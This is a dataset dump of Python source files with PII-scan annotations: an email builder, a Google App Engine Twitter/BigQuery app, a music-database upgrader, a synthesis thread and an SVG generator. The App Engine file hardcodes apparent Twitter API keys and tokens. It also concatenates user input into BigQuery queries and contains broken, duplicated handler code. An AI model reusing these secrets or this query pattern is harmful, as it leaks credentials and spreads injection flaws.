MM_DEFAULT_CRLF, + MM_DEFAULT_CRLF, + att.get_part_body() + ]) + + return ''.join(lines) + + def build(self): + has_html = self.html != None + has_text = self.text != None + has_img = len(self.images) > 0 + has_att = len(self.attachments) > 0 + + if has_text and not has_html: + self.html = MimemailPartHtml(re.sub(r'\n', '
    ', self.text.plain_content, re.M | re.S), charset = self.charset) + elif has_html and not has_text: + self.text = MimemailPartText(re.sub(r'<|>|/', '', self.html.plain_content, re.M | re.S | re.U), charset = self.charset) + elif not has_html and not has_text and not has_att: + raise MimemailException('An email has no content to send') + + if has_img: + for image in self.images: + src = image.get_file_path() + dst = 'cid:' + image.get_image_cid() + self.html.plain_content = self.html.plain_content.replace(os.path.basename(src), dst) + + boundary = 'alt_' + gen_boundary_hash() + self.headers['Content-Type'] = 'multipart/alternative; boundary=""' + boundary + '""' + + self.body = ''.join([ + '--%s%s' % ( boundary, MM_DEFAULT_CRLF ), + self.text.get_part_header(), + MM_DEFAULT_CRLF, + MM_DEFAULT_CRLF, + self.text.get_part_body(), + '%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF ), + self.html.get_part_header(), + MM_DEFAULT_CRLF, + MM_DEFAULT_CRLF, + self.html.get_part_body(), + '%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF ) + ]) + + if has_img: + boundary = 'rel_' + gen_boundary_hash() + self.body = ''.join([ + '--%s%s' % ( boundary, MM_DEFAULT_CRLF ), + 'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF), + self.body, + self.create_images_part(boundary), + '%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF ) + ]) + self.headers['Content-Type'] = 'multipart/related; boundary=""%s""' % (boundary) + + if has_att: + boundary = 'att_' + gen_boundary_hash() + self.body = ''.join([ + '--%s%s' % (boundary, MM_DEFAULT_CRLF ), + 'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF), + self.body, + self.create_attachments_part(boundary), + '%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF ) + ]) + self.headers['Content-Type'] = 'multipart/mixed; boundary=""%s""' % (boundary) + + self.headers['Message-ID'] = self.gen_message_id() + + if hasattr(self, 'subject'): + self.headers['Subject'] = encode_header(self.subject, self.charset) + + def gen_message_id(self): + return '<%s.%08x@%s>' % (datetime.datetime.now().strftime('%Y%m%d%H%M%S'), random.randint(0, sys.maxint), self.kw.get('host', 'localhost')) + + def add_recipient(self, email, name = None): + self.recipients[email] = name if name else email + + def send(self): + self.build() + + extra_headers = self.get_extra_headers() + + for email, name in self.recipients.iteritems(): + message = '%s%sTo: %s <%s>%s%s%s' % (extra_headers, MM_DEFAULT_CRLF, encode_header(name, self.charset), email, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF, self.body) + s = smtplib.SMTP(self.kw.get('smtp_relay', '127.0.0.1')) + s.sendmail(self.from_email, email, message) + s.quit() + + def get_extra_headers(self): + return MM_DEFAULT_CRLF.join([ '%s: %s' % (k, v) for k,v in self.headers.iteritems() ]) + + +",5966,"[['PERSON', 'OrderedDict'], ['PERSON', 'odict'], ['PERSON', 'odict'], ['LOCATION', 'set_from(self'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'self.bo'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.fr'], ['URL', 'self.kw'], ['URL', 'self.ch'], ['URL', 'self.fr'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.su'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.at'], ['URL', 'att.ge'], ['URL', 'att.ge'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ht'], ['URL', 're.su'], ['URL', 'self.text.pl'], ['URL', 'self.ch'], ['URL', 're.su'], ['URL', 'self.html.pl'], ['URL', 'self.ch'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.html.pl'], ['URL', 'self.html.pl'], ['URL', 'content.re'], ['URL', 'os.path.ba'], ['URL', 'self.bo'], ['URL', 'self.text.ge'], ['URL', 'self.text.ge'], ['URL', 'self.html.ge'], ['URL', 'self.html.ge'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.ge'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'datetime.datetime.no'], ['URL', 'sys.ma'], ['URL', 'self.kw.ge'], ['URL', 'self.re'], ['URL', 'self.ge'], ['URL', 'self.recipients.it'], ['URL', 'self.ch'], ['URL', 'self.bo'], ['URL', 'smtplib.SM'], ['URL', 'self.kw.ge'], ['URL', 's.se'], ['URL', 'self.fr'], ['URL', 'CRLF.jo'], ['URL', 'self.headers.it']]" +45,"__author__ = dummy@email.com (J. Matthew Landis)' + + +import os +import logging +import pickle +import webapp2 +import time +import httplib2 +import json +import tweepy +import haigha +from collections import Counter +from haigha.connections.rabbit_connection import RabbitConnection +from apiclient import discovery +from oauth2client import appengine +from oauth2client import client +from google.appengine.api import memcache +from google.appengine.api import users +from google.appengine.ext import ndb +from google.appengine.ext.webapp import template +####################################################################### + +PROJECTID = '934763316754' + +CLIENT_SECRETS = os.path.join(os.path.dirname(__file__), 'client_secrets.json') + +# Helpful message to display in the browser if the CLIENT_SECRETS file +# is missing. +MISSING_CLIENT_SECRETS_MESSAGE = """""""""" +

    Warning: Please configure OAuth 2.0

    +

    +To make this sample run you will need to populate the client_secrets.json file +found at: +

    +

    +%s. +

    +

    with information found on the APIs Console. +

    +"""""" % CLIENT_SECRETS + +http = httplib2.Http(memcache) +service = discovery.build(""plus"", ""v1"", http=http) +bigquery_service = discovery.build(""bigquery"",""v2"", http=http) + +consumer_key = ""9xNrmD6hE0xnRSYdZt5t0XT0B"" +consumer_secret = ""kperqjklvPhBCVvHI96aZIfJu5w1DHI2BZoNMdBEvBPfmuZIYG"" +access_token = ""46501499-cijYvv9ixtQKHLSiLt9QaRtcmWeEKvvGZK5s6ukw7"" +access_token_secret = ""D127XCAN02BPb0ZtcreCG6dpBJyiiLCeD6ckS2MgdHqwG"" + +auth = tweepy.OAuthHandler(consumer_key, consumer_secret) +auth.set_access_token(access_token, access_token_secret) +api = tweepy.API(auth) + +decorator = appengine.oauth2decorator_from_clientsecrets( + CLIENT_SECRETS, + scope='https://www.googleapis.com/auth/plus.me', + message=MISSING_CLIENT_SECRETS_MESSAGE) + +bq_decorator = appengine.oauth2decorator_from_clientsecrets( + CLIENT_SECRETS, + scope='https://www.googleapis.com/auth/bigquery', + message=MISSING_CLIENT_SECRETS_MESSAGE) + +## Function to retrieve and render a template +def render_template(handler, templatename, templatevalues): + path = os.path.join(os.path.dirname(__file__), 'templates/' + templatename) + html = template.render(path, templatevalues) + handler.response.out.write(html) + +####################################################################### +## Handles and loads index page +class MainPage(webapp2.RequestHandler): + + def get(self): + nickname = ""null"" + email = ""null"" + user = users.get_current_user() + if user: + res = UserModel.query(UserModel.uid == user.user_id()).fetch() + if res: + ui = res[0] + nickname = ui.fname+ "" "" +ui.lname + email = user.email() + login = users.create_login_url('/') + else: + nickname = user.nickname() + email = user.email() + login = '/createProfile' + else: + ui = None + login = users.create_login_url('/') + logout = users.create_logout_url('/') + os.system(""python stream.py"") + template_values = { + 'login': login, + 'logout': logout, + 'user': user, + 'nickname': nickname, + 'email': email + } + render_template(self, 'index.html', template_values) + +####################################################################### +## Handle user info and profile +class CreateProfile(webapp2.RequestHandler): + def get(self): + user = users.get_current_user() + if user: + res = UserModel.query(UserModel.uid == user.user_id()).fetch() + if res: + self.redirect('/profile') + else: + template_data = {'logout':users.create_logout_url('/'), 'nickname': users.nickname()} + template_path = 'templates/createProfile.html' + self.response.out.write(template.render(template_path,template_data)) + else: + self.redirect(user.create_login_url('/')) + + +####################################################################### +## process user profile +## check for user signed in, if so, save the entered information, otherwise, redirect them to the login page +class ProcessUser(webapp2.RequestHandler) : + + def post(self) : + user = users.get_current_user() + if user: + fname = self.request.get('fname') + lname = self.request.get('lname') + fname.replace("" "", """") + lname.replace("" "", """") + words = self.request.get_all('word') + if (not(not fname)) & (not(not lname)): + NewUser = UserModel() + NewUser.uid = user.user_id() + NewUser.fname = fname + NewUser.lname = lname + NewUser.words = [] + for word in words: + word.replace("" "", """") + if word: + NewUser.words+=[word] + NewUser.put() + self.redirect('/profile') + else: + self.redirect('/createProfile') + else: + self.redirect(users.create_login_url('/')) + +####################################################################### +## Model Data +class DataHandler(webapp2.RequestHandler) : + + @bq_decorator.oauth_aware + def get(self) : + if bq_decorator.has_credentials(): + http = bq_decorator.http() + inputData = self.request.get(""inputData"") + queryData = {'query':'SELECT SUM(word_count) as WCount,corpus_date,group_concat(corpus) as Work FROM ' +'[publicdata:samples.shakespeare] WHERE word=""'+inputData+'"" and corpus_date>0 GROUP BY corpus_date ORDER BY WCount'} + tableData = bigquery_service.jobs() + dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http) + + resp = [] + if 'rows' in dataList: + #parse dataList + for row in dataList['rows']: + for key,dict_list in row.iteritems(): + count = dict_list[0] + year = dict_list[1] + corpus = dict_list[2] + resp.append({'count': count['v'],'year':year['v'],'corpus':corpus['v']}) + else: + resp.append({'count':'0','year':'0','corpus':'0'}) + self.response.headers['Content-Type'] = 'application/json' + self.response.out.write(json.dumps(resp)) + else: + self.response.write(json.dumps({'error':'No credentials'})) + + +####################################################################### +## Model Words +class WordsHandler(webapp2.RequestHandler) : + + @bq_decorator.oauth_aware + def get(self) : + if bq_decorator.has_credentials(): + http = bq_decorator.http() + inputData = self.request.get(""inputData"") + queryData = {'query':'SELECT text FROM ' +'[doctor-know:rtda.tweets] WHERE Words CONTAINS ""'+inputData+'""GROUP BY text ORDER BY text LIMIT 150'} + tableData = bigquery_service.jobs() + dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http) + + resp = {} + resp['text'] = status.text + resp['created_at'] = time.mktime(status.created_at.timetuple()) + resp['geo'] = status.geo + resp['source'] = status.source + self.response.headers['Content-Type'] = 'application/json' + self.response.out.write(json.dumps(resp)) + else: + self.response.write(json.dumps({'error':'No credentials'})) + + +####################################################################### +## Model Words +class WordsHandler(webapp2.RequestHandler) : + + inputData = ""yes"" + @bq_decorator.oauth_aware + def get(self) : + if bq_decorator.has_credentials(): + http = bq_decorator.http() + inputData = self.request.get(""inputData"") + queryData = {'query':'SELECT text FROM ' +'[doctor-know:rtda.tweets] WHERE text CONTAINS ""'+inputData+'"" GROUP BY text ORDER BY text LIMIT 300'} + tableData = bigquery_service.jobs() + dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http) + + tweets = [] + if 'rows' in dataList: + #parse dataList + count = 0 + for row in dataList['rows']: + for key,dict_list in row.iteritems(): + tweet = dict_list[0] + count += 1 + tweets.append({'text': tweet}) + if count == 300: + break + + + ignore_words = [ ""fuck"", ""shit"", ""cock"", ""penis"", ""porn""] + words = [] + for tweet in tweets: + tt = tweet.get('text', """") + for word in tt.split(): + if ""http"" in word: + continue + if word not in ignore_words: + words.append(word) + + resp = Counter(words) + + resp.headers.add('Access-Control-Allow-Origin', ""*"") + return resp + + # self.response.headers['Content-Type'] = 'application/json' + # self.response.out.write(json.dumps(tweets)) + # else: + # self.response.write(json.dumps({'error':'No credentials'})) + + +####################################################################### +## Profile Page +class ProfilePage(webapp2.RequestHandler) : + + def get(self): + user = users.get_current_user() + if user: + res = UserModel.query(UserModel.uid == user.user_id()).fetch() + if res: + ui = res[0] + template_data = {'firstname': ui.fname, 'lastname': ui.lname, 'words': ui.words, 'nickname': ui.fname+ "" "" +ui.lname, 'logout': users.create_logout_url('/')} + template_path = 'templates/profile.html' + self.response.out.write(template.render(template_path,template_data)) + else: + self.redirect('/createProfile') + else: + self.redirect(users.create_login_url('/')) + +####################################################################### +## Artificial Creativity Engine +class DisplayEngine(webapp2.RequestHandler) : + + def get(self): + user = users.get_current_user() + if user: + res = UserModel.query(UserModel.uid == user.user_id()).fetch() + if res: + ui = res[0] + template_data = {'nickname': ui.fname+ "" "" +ui.lname, 'logout': users.create_logout_url('/')} + template_path = 'templates/engine.html' + self.response.out.write(template.render(template_path,template_data)) + else: + template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')} + template_path = 'templates/engine.html' + self.response.out.write(template.render(template_path,template_data)) + else: + self.redirect(users.create_login_url('/')) + + +####################################################################### +## Data Analysis +class DisplayData(webapp2.RequestHandler) : + + def get(self): + user = users.get_current_user() + if user: + res = UserModel.query(UserModel.uid == user.user_id()).fetch() + if res: + ui = res[0] + template_data = {'nickname': ui.fname+ "" "" +ui.lname, 'logout': users.create_logout_url('/')} + template_path = 'templates/data.html' + self.response.out.write(template.render(template_path,template_data)) + else: + template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')} + template_path = 'templates/data.html' + self.response.out.write(template.render(template_path,template_data)) + else: + self.redirect(users.create_login_url('/')) + + +####################################################################### +## Establish/Update User Profile +class UserModel(ndb.Model) : + uid = ndb.StringProperty(indexed=True) + fname = ndb.StringProperty(indexed = False) + lname = ndb.StringProperty(indexed = False) + words = ndb.StringProperty(indexed=False,repeated=True) + +####################################################################### +## Establish/Update User Profile +# class CustomStreamListener(tweepy.StreamListener): +# def __init__(self, api): +# self.api = api +# super(tweepy.StreamListener, self).__init__() + +# #setup rabbitMQ Connection +# self.connection = RabbitConnection(host='127.0.0.1', heartbeat=None, debug=True) + +# self.channel = self.connection.channel() + +# #set max queue size +# args = {""x-max-length"": 2000} + +# self.channel.queue.declare(queue='twitter_topic_feed', arguments=args) + +# def on_status(self, status): +# print status.text, ""\n"" + +# data = {} +# data['text'] = status.text +# data['created_at'] = time.mktime(status.created_at.timetuple()) +# data['geo'] = status.geo +# data['source'] = status.source + +# #queue the tweet +# self.channel.basic.publish(exchange='', +# routing_key='twitter_topic_feed', +# body=json.dumps(data)) + +# def on_error(self, status_code): +# print >> sys.stderr, 'Encountered error with status code:', status_code +# return True # Don't kill the stream + +# def on_timeout(self): +# print >> sys.stderr, 'Timeout...' +# return True # Don't kill the stream + +# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api)) +# # my keyword today is chelsea as the team just had a big win +# sapi.filter(track=[self.request.get(""inputData"")]) + + +####################################################################### +## Establish/Update User Profile +# class CustomStreamListener(tweepy.StreamListener): +# def __init__(self, api): +# self.api = api +# super(tweepy.StreamListener, self).__init__() + +# #setup rabbitMQ Connection +# self.connection = RabbitConnection(host='127.0.0.1', heartbeat=None, debug=True) + +# self.channel = self.connection.channel() + +# #set max queue size +# args = {""x-max-length"": 2000} + +# self.channel.queue.declare(queue='twitter_topic_feed', arguments=args) + +# def on_status(self, status): +# print status.text, ""\n"" + +# data = {} +# data['text'] = status.text +# data['created_at'] = time.mktime(status.created_at.timetuple()) +# data['geo'] = status.geo +# data['source'] = status.source + +# #queue the tweet +# self.channel.basic.publish(exchange='', +# routing_key='twitter_topic_feed', +# body=json.dumps(data)) + +# def on_error(self, status_code): +# print >> sys.stderr, 'Encountered error with status code:', status_code +# return True # Don't kill the stream + +# def on_timeout(self): +# print >> sys.stderr, 'Timeout...' +# return True # Don't kill the stream + +# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api)) +# # my keyword today is chelsea as the team just had a big win +# sapi.filter(track=[self.request.get(""inputData"")]) + +app = webapp2.WSGIApplication( [ + ('/', MainPage), + ('/profile', ProfilePage), + ('/createProfile', CreateProfile), + ('/userRegister', ProcessUser), + ('/getData', DataHandler), + ('/getWords', WordsHandler), + ('/data', DisplayData), + ('/engine', DisplayEngine), + (decorator.callback_path, decorator.callback_handler()), + (bq_decorator.callback_path, bq_decorator.callback_handler()) +], debug=True) +",15015,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'J. Matthew Landis'], ['PERSON', 'api = tweepy'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'user.ni'], ['URL', 'users.cr'], ['URL', 'users.cr'], ['URL', 'os.sy'], ['URL', 'stream.py'], ['URL', 'self.red'], ['URL', 'user.cr'], ['URL', 'self.red'], ['URL', 'users.cr'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['LOCATION', 'queryData).execute(http'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'profile.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'StreamListener'], ['PERSON', ""RabbitConnection(host='127.0.0.1""], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'StreamListener'], ['PERSON', ""RabbitConnection(host='127.0.0.1""], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'ProcessUser'], ['URL', 'https://code.google.com/apis/console""'], ['URL', ""https://www.googleapis.com/auth/plus.me',""], ['URL', ""https://www.googleapis.com/auth/bigquery',""], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'email.com'], ['URL', 'haigha.co'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'httplib2.Ht'], ['URL', 'auth.se'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'template.re'], ['URL', 'handler.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'index.ht'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.red'], ['URL', 'users.cr'], ['URL', 'users.ni'], ['URL', 'createProfile.ht'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'self.request.ge'], ['URL', 'self.request.ge'], ['URL', 'fname.re'], ['URL', 'lname.re'], ['URL', 'self.request.ge'], ['URL', 'user.us'], ['URL', 'word.re'], ['URL', 'self.red'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'samples.sh'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'tweet.ge'], ['URL', 'resp.headers.ad'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'ndb.Mo'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'webapp2.WS'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca']]" +46,"#!/usr/bin/python +# Copyright (c) 2014-2015 Cedric Bellegarde dummy@email.com +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + +from lollypop.sqlcursor import SqlCursor + + +class DatabaseUpgrade: + """""" + Manage database schema upgrades + """""" + + def __init__(self, version, db): + """""" + Init object + @param version as int + @param db as Database + """""" + self._version = version + self._db = db + # Here are schema upgrade, key is database version, + # value is sql request + self._UPGRADES = { + 1: ""update tracks set duration=CAST(duration as INTEGER);"", + 2: ""update albums set artist_id=-2001 where artist_id=-999;"" + } + + """""" + Return upgrade count + @return int + """""" + def count(self): + return len(self._UPGRADES) + + """""" + Upgrade database based on version + @return new db version as int + """""" + def do_db_upgrade(self): + with SqlCursor(self._db) as sql: + for i in range(self._version+1, len(self._UPGRADES)+1): + try: + sql.execute(self._UPGRADES[i]) + except Exception as e: + print(""Database upgrade failed: "", e) + sql.commit() + return len(self._UPGRADES) +",1917,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014-2015'], ['PERSON', 'Cedric Bellegarde'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'sql.com']]" +47,"# -*- coding: utf-8 -*- + +""""""Thread of structural synthesis."""""" + +__author__ = ""Yuan Chang"" +__copyright__ = ""Copyright (C) 2016-2021"" +__license__ = ""AGPL"" +__email__ = dummy@email.com"" + +from typing import Sequence, Dict, List +from qtpy.QtCore import Signal +from qtpy.QtWidgets import QWidget, QTreeWidgetItem +from pyslvs.graph import ( + link_synthesis, + contracted_link_synthesis, + contracted_graph, + conventional_graph, + Graph, +) +from pyslvs_ui.synthesis.thread import BaseThread + +Assortment = Sequence[int] + + +def assortment_eval(links_expr: str) -> Assortment: + """"""Return link assortment from expr."""""" + return tuple(int(n.split('=')[-1]) for n in links_expr.split("", "")) + + +class LinkThread(BaseThread): + """"""Link assortment synthesis thread."""""" + + progress_update = Signal(int) + result = Signal(dict) + size_update = Signal(int) + + def __init__(self, nl: int, nj: int, parent: QWidget): + super(LinkThread, self).__init__(parent) + self.nl = nl + self.nj = nj + + def run(self) -> None: + """"""Run and return contracted link assortment."""""" + try: + la_list = link_synthesis(self.nl, self.nj, lambda: self.is_stop) + except ValueError: + self.progress_update.emit(1) + self.result.emit({}) + self.finished.emit() + return + + self.size_update.emit(len(la_list)) + assortment = {} + for i, la in enumerate(la_list): + if self.is_stop: + break + assortment[la] = contracted_link_synthesis(la, lambda: self.is_stop) + self.progress_update.emit(1 + i) + self.result.emit(assortment) + self.finished.emit() + + +class GraphThread(BaseThread): + """"""Graphs enumeration thread."""""" + progress_update = Signal(int) + count_update = Signal(QTreeWidgetItem, int) + result = Signal(list) + + def __init__(self, jobs: Sequence[QTreeWidgetItem], degenerate: int, parent: QWidget): + super(GraphThread, self).__init__(parent) + self.jobs = jobs + self.degenerate = degenerate + + def run(self) -> None: + """"""Run and return conventional graph."""""" + cg_list: Dict[Sequence[int], List[Graph]] = {} + answers = [] + for i, item in enumerate(self.jobs): + if self.is_stop: + break + + root = item.parent() + la = assortment_eval(root.text(0)) + cla = assortment_eval(item.text(0)) + if la not in cg_list: + cg_list[la] = contracted_graph(la, lambda: self.is_stop) + + answer = conventional_graph( + cg_list[la], + cla, + self.degenerate, + lambda: self.is_stop + ) + self.count_update.emit(item, len(answer)) + answers.extend(answer) + self.progress_update.emit(1 + i) + + self.result.emit(answers) + self.finished.emit() +",2931,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Yuan Chang'], ['DATE_TIME', '2016-2021'], ['PERSON', 'QtCore'], ['URL', 'self.nl'], ['URL', 'self.nl'], ['URL', 'self.is'], ['URL', 'self.is'], ['URL', 'self.pro'], ['PERSON', 'Sequence[QTreeWidgetItem'], ['URL', 'email.com'], ['URL', 'pyslvs.gr'], ['URL', 'ui.synthesis.th'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.si'], ['URL', 'self.is'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.jo'], ['URL', 'self.de'], ['URL', 'self.jo'], ['URL', 'self.is'], ['URL', 'item.pa'], ['URL', 'self.is'], ['URL', 'self.de'], ['URL', 'self.is'], ['URL', 'self.co'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi']]" +48,"#!/usr/bin/env python3 + +import xml.etree.ElementTree as ET + +def get_target(): + return SVG() + +class SVG: + def __init__(self): + self.svg = ET.parse('skeleton.svg') + self.mmpx = 3.543307 + + def output(self, path): + self.svg.write(path) + + + def add_package(self, package): + ''' + Target SVG only handles one drawing at a time, only last added drawing will be part of output + ''' + self.svg = ET.parse('skeleton.svg') + + self.package = \ + { + 'name': package['name'], + 'pads': [], + 'mnt_pads': [], + 'holes': [], + 'lines': [], + 'circles': [], + 'rectangles': [] , + 'texts': [] + } + + + def output(self, fout): + + package = self.package + + for pad in package['pads']: + self.gen_pac_pad(pad) + + for mnt_pad in package['mnt_pads']: # TODO, adding mnt_pads not done + self.gen_pac_mnt_pad(mnt_pad) + + for hole in package['holes']: + self.gen_pac_hole(hole) + + for line in package['lines']: + self.gen_pac_line(line) + + if(0): + + for circle in package['circles']: + self.gen_pac_circle(circle) + + for rect in package['rectangles']: + self.gen_pac_rectangle(rect) + + for text in package['texts']: + self.gen_pac_text(text) + + self.svg.write(fout) + + + def add_pac_pad(self, type, angle, size, pos, number): + + self.package['pads'].append( + { + 'type': type, + 'angle': angle, + 'size': size, + 'pos': pos, + 'number': number + }) + + def add_pac_hole(self, diameter, pos): + + self.package['holes'].append( + { + 'd': diameter, + 'pos': pos + }) + + def add_pac_line(self, layer, width, vertices): + + self.package['lines'].append( + { + 'layer': layer, + 'width': width, + 'vertices': vertices + }) + + def gen_pac_pad(self, pad): # type, angle, size, pos, number + + top_layer = self.svg.find('.//g[@id=""Top""]') + + # TODO: Types and angle + + el = ET.SubElement(top_layer, 'rect') + el.set('style', 'fill:#ff0000;fill-opacity:1;stroke:none;stroke-width:10;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1') + el.set('id', 'pin_{}'.format(pad['number'])) + el.set('width', '{}'.format(pad['size'][0]*self.mmpx)) + el.set('height', '{}'.format(pad['size'][1]*self.mmpx)) + el.set('x', '{}'.format((pad['pos'][0] - pad['size'][0]/2)*self.mmpx)) + el.set('y', '{}'.format((pad['pos'][1] - pad['size'][1]/2)*self.mmpx)) + + + def gen_pac_hole(self, hole): + + top_layer = self.svg.find('.//g[@id=""Holes""]') + + circle = ET.SubElement(top_layer, 'circle') + + circle.set('style', 